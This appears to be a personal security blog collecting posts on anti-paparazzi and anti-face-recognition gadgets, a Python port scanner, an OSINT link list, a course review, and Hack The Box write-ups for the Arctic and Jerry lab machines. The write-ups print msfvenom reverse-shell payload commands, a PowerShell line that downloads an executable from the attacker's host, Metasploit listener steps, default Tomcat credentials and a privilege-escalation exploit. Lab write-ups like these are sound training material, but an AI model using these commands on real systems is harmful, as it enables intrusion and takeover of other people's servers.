Anti-Paparazzi technology part 2

The last post about Anti-Paparazzi clothing sent me down a rabbit hole finding out about other recent inventions designed to stop cameras. Here’s a brief summary of what other options exist if you cant get hold of a nifty reflective scarf:

Flash back handbag

anti-paparazzi

A student named Adam Harvey invented a handbag add-on which detects a camera flash and in return flashes right back at it before the photo is taken. The result is a ruined photograph. I believe the downside is that this device is only quick enough to thwart slower shutter speeds which is good enough in you are in a dark area or out at night but won’t have much of an effect at sporting events where photographers will typically be using quicker shutter speed settings. The device is also not in commercial production but the inventor still deserves some respect for trying to beat a flash at it’s own game.

The inventors website

Write up at Wired.com

Write up at techcrunch.com

Anti photography paint

An article in the express claims that any photographs taken of Angelina Jolie giving birth are fakes because the hospital she was at coated the windows with anti-photography paint. I’m a bit dubious about this claim as the article gives no further details about how it works and google comes up short when trying to find other examples of this technology being used elsewhere.

I think this might be a bit case of the journalist taking some creative liberties and the windows of the hospital room were either coated with the same stuff as one way mirrors (suggesting the inside was kept darker than normal) or the windows simply had the same privacy filters applied that you can get for your office computer to prevent shoulder surfing:

51psD1PqePL._SL1200_.jpg

Privacy screen from 3M

Dubious article from the Express

Lasers!!!

dance-for-laser-1439327.jpg

A decade ago there were reports of technology on Roman Abramovich’s new super boat which utilised lasers to scan in all directions and detect the CCD (Charged couple device) of a digital camera and blind it. The CCD is the part of the camera which detects light before coding the information into pixels. The lasers are able to detect these and send an extra bright beam directly at the CCD, blinding it without affecting anything else.

this technology was first developed as a way to try to stop pirates recording movies in the cinema. There is a lot of speculation (including from the devices inventor) as to how effective it is when taken outside of a small dark cinema room and stuck to the side of a giant yacht in the ocean in broad daylight.

Wired.com – Romans big yacht

techradar – review of the technology

Anti face recognition

There is some interesting work going into stopping facial recognition technology doing its thing. This won’t stop a paparazzi taking a direct photo of you but it might hinder any automated CCTV or video recording software which activates and focuses based on what it detects as a human face.

at CV Dazzle there is a group of make up artists designing styles which stop common facial recognition technology from being able to detect a face. It works by disguising common features which some face recognition technology relies on such as the colouring of eyes, the nose bridge or the edges of the mouth.

anti face recognition make up

The same guy mentioned previously (Adam Harvey) who works on CV Dazzle and the flash-back camera also has a project called “Hyperface” which designs patterns which instead of being detected as a non-face gets detected as hundreds of individual faces, hopefully confusing the facial recognition software and hiding your real face.

Looking at the sample designs it seems strange at how little is needed for software to detect a “face”. a very simple design of pixels which can just about pass as eyes, nose and a mouth seems to be all it takes:

facial recognition baffle

 

CV Dazzle – make up camouflage

Hyperface

 

Anti-Paparazzi clothing

This is probably a problem which doesn’t affect too many readers but if you want to avoid having your photo taken on a night out either by a professional photographer or a snap-happy friend with an iPhone there is a company named “Beta Brand” who makes anti-paparazzi clothing which makes photos look like this:betabrand-photobomber

The clothing itself contains lots of tiny glass spheres which act as a super reflective material which bounce back as much of the light from a flash as possible and tricking a camera into thinking the scene is a lot lighter than it really is. A lot of today’s modern cameras will auto adjust the picture settings and make everything seem darker to adjust for the mass of light it see’s coming in.

Its main downsides are that it doesn’t work if the camera isn’t using a flash or if the photographer is manually adjusting all the settings. The clothes aren’t too overpriced and look cool themselves so it’s likely that wearing them might end up attracting more attention from fans who snap a photo, check that it looks weird and suddenly get more curious as to what is going on.

You can read more about it here:

PetaPixel – Watch flashback anti-paparazzi clothing ruin flash photographs

Digitalrev – How anti paparazzi clothing works

Bored Panda – Anti paparazzi clothing chris holmes

port scanner python script

Python port scanner – raw code with explanation

If you ever find yourself without access to Nmap here is some quick python code for testing the up/down status of 1000 TCP ports on a target host. The code is explained at the bottom:

#!/usr/bin/python

import socket
from termcolor import colored

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.setdefaulttimeout(1)

host = input(“Enter the target host: “)

def portscanner(port):
if sock.connect_ex((host,port)):
print(colored(“Port %d is closed” % (port), ‘red’))
else:
print(colored(“port %d is open” % (port), ‘green’))

for port in range(1,1000):
portscanner(port)

Explanation:

import socket
from termcolor import colored

These 2 libraries are responsible for creating the connection to the target and for allowing us to add colour to the output

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.setdefaulttimeout(1)

Sets the connection to use IP4 and sets the timeout to 1 second so you don’t get stuck waiting for connection requests to time out

host = input(“Enter the target host: “)

This is the prompt which you see when you run the code, it adds the input to the ‘host’ variable

def portscanner(port):
if sock.connect_ex((host,port)):
print(colored(“Port %d is closed” % (port), ‘red’))
else:
print(colored(“port %d is open” % (port), ‘green’))

Here is the main function. Instead of testing for a successful connection it looks for a failure, if so it reports that the port is closed. If anything else comes back it assumes the port is open and reports that.

for port in range(1,1000):

Sets the script to scan ports 1- 1000, you can change this to specific numbers or increase the range up to 65535

Hack the Box - Arctic - Writeup

Hack The Box – Arctic – writeup

Arctic is a vulnerable windows box showing the risks of running an unpatched Coldfusion server and a very out dated windows 2008 r2 server.

First step as standard is to run a nmap scan and see what ports are available to us:1

There are 3 ports visible from the scan, port 135 and 49154 are standard for RPC and they are present on a lot of HTB boxes. the mystery port 8500 is unknown to nmap so lets take a look at that one first. Google tells us it’s the default port for Adobe Coldfusion.

2

Visiting the host on port 8500 using a browser gives us a directory to we can navigate. the letters CF at the start of the names are another clue pointing to this being a Coldfusion server.

3

For whatever reason this directory takes absolutely ages to load each page so to make things easier I tried loading every page I saw in a new tab and went away for 10 minutes to make a cup of tea while they loaded.

4

The CFIDE folder contained an administrator page which is all the confirmation we need about this being a Coldfusion host. It also tells us this is version 8.

5

Some more Google enumeration tells us that version 8 came out in 2007, if this is a base install then there will almost certainly be many different vulnerabilities out by now we could use to try and break into this box (nothing stays secure forever):

6

Searching on exploit-db by date we can see a few cross site scripting vulnerabilities but more helpfully an arbitrary file upload.

7

Taking a quick look at the code it seems like a small ruby script which exploits the FCKeditor upload functionality, it also has a module in Metasploit which makes things easier for us.

8

If you launch Msfconsole and search for “Coldfusion”, there are a few results. Looks like number 7 most closely matches what we found in exploit-db. The only difference is the date.9

The exploit only requires a remote host and remote port.

10

Unfortunately it fails when run. Time to start trying harder!

11

The next step felt like I got a bit lucky. When an exploit fails to run one of the first things I check is whether the victim box is still up and running. Sometimes other users have broken it or a failed exploit causes it to crash so you need to give it a reboot before continuing. As a test I refreshed the IE page and when it came back I saw it had a new folder called “userfiles”. So the exploit hadn’t totally failed , looks likes it had managed to upload at least some files:

12

This new folder contains a .jsp file which is likely the exploit Metasploit had uploaded but for whatever reason had failed to run. Lets setup up a listener and see if we can run it manually. The error from Metasploit earlier showed us that we expect to reverse shell to start talking on port 4444:

13

Now click on the .jsp

14

And it works! we are on the server as a user named tolis:

15

The flag is in the expected location:

16

tolis doesn’t have admin rights so in order to get the root flag we’re going to have to start looking at what privilege escalation we have available to us. Systeminfo tells us that this is a server 2008 R2 system so unless it is patched up to the latest version we should be able to find a few things to try:

17

But before jumping straight into new exploits It’s always a good idea to try to improve whatever shell you managed to get as a foothold. In this instance we’re going to try and transfer this shell into the Metasploit meterpreter to take advantage of all the extra features it has over our basic shell. We can try to create a payload using msfvenom and hopefully it’ll let us upload it using the shell we currently have. We know the server is some sort of web server so it likely won’t have any problems if we use a HTTP reverse shell.

msfvenom -p windows/x64/meterpreter_reverse_http LHOST=10.10.14.6 LPORT=4567 -f jsp -o dodgyfile.exe

18

Now to start the SimpleHTTPserver that comes with Kali:

19

And after a bit of trial and error we can download the payload to the victim server using this line:

powershell -c “(new-object System.Net.WebClient).DownloadFile(‘http://10.10.14.20:80/dodgyfile.exe’,’superdodgy.exe’)”

20

Before we run it we need to setup the listener on our Kali box to be ready to catch the incoming connection, back in msfconsole we set the payload type, the host and port to listen on (Matching what we set in msfvenom previously):

22

23

Back on the victim machine lets run the payload and see if it works:

24

It connects instantly and we can start enjoying our new shell:

25

One of the first things to try is the built in “getsystem” command within Meterpreter which tries a few quick privilege escalation methods. I don’t find that it works too often but it’s quick enough that it never hurts to try:

26

No luck. Another feature of the meterpreter shell is a post-exploit tool which can scan the system and suggest possible privilege escalations to try located at: /post/multi/recon/local_exploit_suggester which finds 11 possible exploits and after some quick tests suggests 4 of them are likely to work:

27

Starting at the top lets try ms10_092_schelevator after backgrounding our new shell

28

Setting our session option and running it looks promising at first but gives mixed messages about whether it has worked or not:

29

If we have another look at the options for this exploit it shows that the LHOST isn’t set correctly:

30

If we fix that to use the IP we have on the HTB network instead of on the local network the exploit works better and we get our system shell:

31

Root flag is in the usual location:

32

OSINT Cheat sheet

A collection of links for Open Source intelligence research, mostly focused on domain names instead of people or companies.

If you’re stuck with a OSINT challenge go through these links one by one and see if any extra info comes up that you’ve missed previously.

 

For websites and servers:

Google default link : Link

Google country specific link: Google UK

Google site: specific search: Google site

Yandex: Russian Search engine

Yandex site specific search: Yandex site search

Baidu: Chinese search engine

Bing: Bing

Bing IP search : See what else is hosted on the same IP

Millionshort: Omit results from the top 1 million most popular websites

whois; Details about the registrar

Web time machine : Internet time machine

Pastebin : Search through text dumps

Global File Search: Index of public ftp servers

Shodan : Internet of things

DNS Dumpster: More DNS info

dmitry : Kali tool, usage: dmitry HOSTNAME, does a lot of what the above sites does.

dig : Kali tool, usage : dig Target ANY

Robotex : Automated DNS loop and a bit more neatly presented

Hunter.io : Find e-mail addresses associated with a domain

Social Media:

Twitter search: Search for hashtags # or @ for users

Facebook : Facebook Search

Linkedin : Warning – if you are logged in then people will see that you have searched for them

Misc:

Guerrilla mail – E-mail common addresses such as admin@domain and see if any bounce backs or out of offices appear

  • Consider typos of things you are looking for
  • search for job postings for the org you are investigating
  • Are there related services which could be searched

 

Hack the Box Jerry

Hack The Box – Jerry – Writeup

Jerry is a retired box from HTB so can only be done if you have a premium VIP account.

It shows the risks of leaving default credentials for installed services. The solution I’ve got here is fairly standard and I’ve kept in a little of extra in terms of thought processes which didn’t go anywhere instead of just writing out how to get the flags yourself.


First step is to run an Nmap scan of the target and note that it only comes back with one port, running Apache Tomcat version 7.0.88 and Coyote JSP Engine 1.1

1

As it looks like a web server, we can visit the site and confirm it looks like a base install of Apache Tomcat version 7.0.88

2

Only thing to notice from this generic Tomcat page is a file path name. This is worth noting in case we are trying to navigate around the file system at a later point in time.

3

Normally this might be the time to start running a tool like dirb or dirbuster to try and find what else is available on this server however some nice links are given to us in the top right as “Server Status” “Manager App” and “Host manager”. All 3 present us with a login box if we try to access them.

4

As this looks like a default install of Tomcat lets check to see if the default credentials have been changed. A quick Google search reveals a Github page with about 20 default passwords listed for tomcat installs. If there were more than 20 we Could use Hydra to automate trying them however as the passwords were short and simple enough you can work through them manually very quickly.

5

Doing this with the Server status module yields success for the login admin:admin

There isn’t much to see on this page, the only thing which stands out is an out of date java version which isn’t directly vulnerable now but worth noting for later if we get stuck.

6

Trying to log into the other modules now gives a HTTP 403 authorisation error instead of the password prompt from before. This is because the site is still trying to login with the admin:admin credential from earlier and while it registers as a valid set of credentials the admin account doesn’t have authorisation to access the other modules. There is no logout option on the site so you need to clear your browser history to reset.

7

A different set of  default credentials from Github is successful and we can get into the Manager app using tomcat:s3cret

There is plenty of interesting info on this page but the obvious place to start looking is the upload feature. Any functionality which gives us the ability to put our own files onto a remote server and execute them is a good candidate for further investigation.

8

If we can get a file onto the server which executes a reverse shell and connects back to us we can use that as a foothold to get further into the system. Lets use msfvenom to help create this reverse shell in a .war format as it is most likely going to be accepted by the uploader. We know the server is sending out http traffic so as a first choice we should look at using the http reverse shell. Any protocol not blocked by the firewall is likely to work for this.

9

We need to edit the options in the Meterpreter shell with the details of our local machine IP and port and give it a name of dodgyfile.war

msfvenom -p windows/x64/meterpreter_reverse_http LHOST=10.10.14.6 LPORT=4567 -f war -o dodgyfile.war

10

The .war file is going to have a .jsp file inside with a randomised name. This is in an effort to try to disguise it from virus scanners. It’s worth making a note of the name in case we need to manually visit it later. You can view the contents of the war file using any zip tool.

10.1

Now that we have the payload we should setup our machine to start listening in case the reverse shell gets activated as soon as we complete the upload.

Setup Metasploit as the listener by opening it up and using the exploit/multi/handler and giving it a few parameters

11

set the local host to your network interface (Look it up using ifconfig if needed). Set the port to whatever was set in the payload previously.

13

12

Start the listener using exploit -j  (-j puts the process into the background as soon as it starts)

14

Back on the target website lets try and upload our dodgy file. Fingers crossed there aren’t any extra security checks which might flag up the file. (unlikely, but we won’t know util we try)

15

Looks like it has uploaded fine, checking the Metasploit listener it hasn’t auto-ran so we need to find out how to get it started manually.

16

After a bit of clicking about and trying the features on the app manager page it looks like you can manually navigate to the .jsp we noted earlier to get it to execute.

17

As our listener was in the background waiting it caught the incoming connection and we can interact with it using:

sessions -i 1

18

To make things easier to navigate use the shell command and you can start enumeration and browsing for the required flags.

19

Slightly disappointing that there is no privilege escalation required for this box as you start your shell as the system account by default and can go straight into the administration account. The only small challenge left is to remember how to use quotes to see the contents of a text file with spaces in its name. Both flags are in the same text file.

20

 

Review of Udemy course – The RedTeam blueprint a unique guide to ethical hacking

Overview

RedTeam Nation - Brandon Dennis - Certificate of completion
RedTeam Nation – Brandon Dennis – Certificate of completion

The Redteam blue print is a video course created by Brandon Dennis which aims to take anyone with no previous security knowledge and give them a good starting point from which to pursue a career in cyber security.

The course covers all the topics you would expect as well as a multitude of others such as the typical structure of red and blue teams, advice for applying for jobs and tips for passing the interviews.

Most courses I’ve seen in the past briefly advise learners to find a programming language they are comfortable with and take a separate course to improve their knowledge however Brandons course includes 2:30 of Python tutorials and 1:40 in Assembly. While This is only enough to cover the topics briefly it is more than enough to get someone started with either language.

2

Brandon himself has completed the OSCP and is studying for the OSCE. it feels like his choice of topics and how deep he goes into each topic is aimed at someone who eventually wants to commit and study for the OSCP. The course would also be useful for someone looking at the Comptia Security+ or the EC-Council CEH.

Pros

  • Far more in depth than other courses I’ve seen which claim to go to beginner –> hacker
  • Plenty of demonstrations showing the concepts discussed.
  • The course covers far more than just the technical aspect of cyber security.
  • Lots of extra resources provided with the lectures such as templates or links for further reading:
    Extra resources attached to lectures
    Extra resources attached to lectures
  • All the standard stages of a red team assignment are covered: reconnaissance, enumeration, exploit, pivoting, privilege escalation, persistence, covering tracks.
  • The teachers voice is clear and easy to understand.

Cons

  • The screen capture was recorded at a high resolution and is sometimes only visible if you have a good steady internet connection which auto connects at 1080p, for some reason you cannot manually set it to anything higher than 720p which means if you are on a weak connection you cannot see what is happening on screen:High resolution - hard to see console
  • The module regarding job hunting and salary is very specific to the USA. This isn’t Brandons fault and I wouldn’t expect him to tailor-make videos for every country but is worth noting if you are somewhere where the IT job market is very different from America.

Verdict

Very indepth course and value for money if you buy it during a Udemy sale